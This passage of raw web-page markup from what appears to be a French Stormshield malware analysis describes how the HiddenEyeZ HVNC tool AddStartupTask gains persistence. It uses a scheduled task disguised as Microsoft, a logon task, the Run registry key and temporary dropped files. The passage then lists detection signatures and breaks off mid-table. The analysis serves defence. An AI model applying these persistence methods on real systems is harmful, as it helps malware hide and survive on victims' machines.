1.2;\">3072:mN1U+fpbH6rA0LZQy5hYajNFhEwQ6rKXSWdQqxfZ8heWycJ5DfwrxS4wr8isBhHC:21U+fs2ajNTOrlR4ithyT\/TM2aa3<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Pr\u00e9sentation<\/h4>\n<p>Cet outil, d\u00e9ploy\u00e9 et utilis\u00e9 par HiddenEyeZ HVNC, est responsable de la persistance de ce dernier. Il lui garantit un d\u00e9marrage automatique, que ce soit \u00e0 l'ouverture de session de l'utilisateur ou p\u00e9riodiquement une fois par jour \u00e0 heure constante.<\/p>\n<p>Pour cela, trois moyens de persistance sont utilis\u00e9s :<\/p>\n<ul>\n<li>la cr\u00e9ation d'une t\u00e2che planifi\u00e9e p\u00e9riodique cherchant \u00e0 se faire passer pour un \u00e9l\u00e9ment de Windows :\n<ul>\n<li>Auteur : Microsoft<\/li>\n<li>Description : This will keep your software up to date.<\/li>\n<\/ul>\n<\/li>\n<li>la cr\u00e9ation d'une t\u00e2che planifi\u00e9e s'ex\u00e9cutant \u00e0 l'ouverture d'une session utilisateur\u00a0;<\/li>\n<li>l'enregistrement du binaire dans la cl\u00e9 registre <code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run<\/code>.<\/li>\n<\/ul>\n<p>Ce binaire g\u00e8re la mise en place et la d\u00e9sinstallation des moyens de persistance pour le malware HiddenEyeZ HVNC.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414172\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 25 : code d'installation du moyen de persistance AddStartupTask<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Utilisation<\/h4>\n<p>Lors de son utilisation par le malware HiddenEyeZ HVNC, AddStartupTask est d\u00e9pos\u00e9 \u00e0 l'emplacement <code>%TEMP%\\proclog.exe<\/code>. Il est ensuite lanc\u00e9 par l'interm\u00e9diaire d'un script <code>%TEMP%\\drive.bat<\/code>. Suite \u00e0 cette ex\u00e9cution, les deux fichiers sont supprim\u00e9s du disque.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414177\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 26 : code de HiddenEyeZ HVNC ex\u00e9cutant l\u2019outil AddStartupTask<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>Les protections Stormshield face au malware HiddenEyeZ<\/h2>\n<h3>Les protections Stormshield Network Security via flux r\u00e9seau<\/h3>\n<p>L\u2019acc\u00e8s au C2 HiddenEyeZ HVNC est bloqu\u00e9, car cat\u00e9goris\u00e9 comme malware par nos bases de donn\u00e9es de r\u00e9putation d\u2019IP. De plus, les firewalls Stormshield Network Security (SNS) ont la possibilit\u00e9 de filtrer les communications vers divers services, utilis\u00e9s ici par l'attaquant\u00a0:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_9\"\n     id='ninja_table_builder_414269'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_9\"\n     style=\"\n     max-height:500px;\n     max-width: 1160px;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414269\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6534036\" class=\"desktop-view tr_class_6534036 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_57652678\" rowspan=\"1\" colspan=\"1\" class=\"td_class_57652678\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_57652678\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Service \/ Malware<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_69658489\" rowspan=\"1\" colspan=\"1\" class=\"td_class_69658489\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_69658489\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Signature<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7165364\" class=\"desktop-view tr_class_7165364 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_40459981\" rowspan=\"1\" colspan=\"1\" class=\"td_class_40459981\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_40459981\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Serveur de C&amp;C de StormKitty<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_14080508\" rowspan=\"1\" colspan=\"1\" class=\"td_class_14080508\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_14080508\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">http:client:header.226<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8946599\" class=\"desktop-view tr_class_8946599 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_83747915\" rowspan=\"1\" colspan=\"1\" class=\"td_class_83747915\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_83747915\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Serveur Telegram<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_99646158\" rowspan=\"1\" colspan=\"1\" class=\"td_class_99646158\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_99646158\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">tcpudp:hostname.154 \/ ssl:client:sni.25<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3297669\" class=\"desktop-view tr_class_3297669 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_56522342\" rowspan=\"1\" colspan=\"1\" class=\"td_class_56522342\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_56522342\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Serveur Discord<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_91924302\" rowspan=\"1\" colspan=\"1\" class=\"td_class_91924302\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_91924302\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssl:client:sni.24 \/ tcpudp:hostname.153 \/ ssl:server:certificate.102<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Les protections Stormshield Network Security via l\u2019antivirus int\u00e9gr\u00e9<\/h3>\n<p>Voici les signatures SNS d\u00e9tectant les diff\u00e9rents samples via l\u2019antivirus int\u00e9gr\u00e9\u00a0:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_10\"\n     id='ninja_table_builder_414268'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_10\"\n     style=\"\n     max-height:500px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414268\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_4966789\" class=\"desktop-view tr_class_4966789 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_90222141\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90222141\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90222141\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sample<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27780105\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27780105\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27780105\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Signature<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1495381\" class=\"desktop-view tr_class_1495381 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_46876070\" rowspan=\"1\" colspan=\"1\" class=\"td_class_46876070\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_46876070\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Installer r77<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_77333311\" rowspan=\"1\" colspan=\"1\" class=\"td_class_77333311\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_77333311\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan.GenericKD.65601994<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1219673\" class=\"desktop-view tr_class_1219673 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_70960868\" rowspan=\"1\" colspan=\"1\" class=\"td_class_70960868\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_70960868\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Dropper from HiddenEyeZ<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85179042\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85179042\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85179042\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Gen:Trojan.Heur.DNP.Gm0@aK1dYYi<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3678292\" class=\"desktop-view tr_class_3678292 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_31122696\" rowspan=\"1\" colspan=\"1\" class=\"td_class_31122696\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_31122696\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">r77 dll 64 bits<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_29713965\" rowspan=\"1\" colspan=\"1\" class=\"td_class_29713965\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_29713965\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan.GenericKD.65601994<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>Les protections Stormshield Network Security via Breach Fighter<\/h3>\n<p>Voici les signatures SNS d\u00e9tectant les diff\u00e9rents samples via le service Breach Fighter\u00a0:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_11\"\n     id='ninja_table_builder_414267'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_11\"\n     style=\"\n     max-height:800px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414267\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_7961592\" class=\"desktop-view tr_class_7961592 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_64932601\" rowspan=\"1\" colspan=\"1\" class=\"td_class_64932601\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_64932601\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Sample<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_17372453\" rowspan=\"1\" colspan=\"1\" class=\"td_class_17372453\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_17372453\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: bold; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Breach Fighter detection<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6947734\" class=\"desktop-view tr_class_6947734 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_86222568\" rowspan=\"1\" colspan=\"1\" class=\"td_class_86222568\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_86222568\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Icarus<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_55154146\" rowspan=\"1\" colspan=\"1\" class=\"td_class_55154146\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_55154146\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Malveillant Trojan:MSILZilla\/25816<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_5936108\" class=\"desktop-view tr_class_5936108 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_19128602\" rowspan=\"1\" colspan=\"1\" class=\"td_class_19128602\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_19128602\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC dropper<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_39001755\" rowspan=\"1\" colspan=\"1\" class=\"td_class_39001755\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_39001755\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Trojan:MSILZilla\/11609<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8048583\" class=\"desktop-view tr_class_8048583 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_10895356\" rowspan=\"1\" colspan=\"1\" class=\"td_class_10895356\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_10895356\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">HiddenEyeZ HVNC<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_13344565\" rowspan=\"1\" colspan=\"1\" class=\"td_class_13344565\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_13344565\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: 